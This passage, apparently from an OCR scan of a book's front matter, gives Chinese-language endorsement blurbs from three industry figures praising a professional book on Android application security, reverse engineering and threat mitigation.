解 的 ， 并 且 对 于 有 效 地 确保 Android 系 统 主 
导 的 移动 环境 的 安全 性 至 关 重 要 。 

一 一 Intel 公 司 旗下 McAfee 产 品 安 全 高 级 总 监 James 


Ransome 


对 于 Android 安 全 领域 的 爱好 者 和 应 用 开 
发 者 来 说 ， 这 是 一 本 很 好 的 专业 书 。 它 介绍 了 
很 多 高 级 专题 ， 比 如，Android 应 用 程序 逆 
向 工程 等 。 对 于 专业 的 安全 分 析 人 员 来 说 ， 这 

是 一 本 必 备 的 工具 书 。 
—— Quick Heal 科 技 公 司 联合 创始 人 Sanjay 
Kartkar 

对 于 想 把 公司 应 用 软件 移植 到 A n droidz& 
统 平台 上 的 企业 来 说 ， 这 是 一 本 非常 优秀 的 专 
业 书 ， 它 可 以 使 你 了 解 Android 应 用 程序 中 
各 种 常见 的 威胁 ， 以 及 应 对 这 些 威胁 的 方法 。 

一 一 苏格兰 皇家 银行 市 场 及 国际 银行 部 副 总 裁 Jagmeet 

Malhotra 
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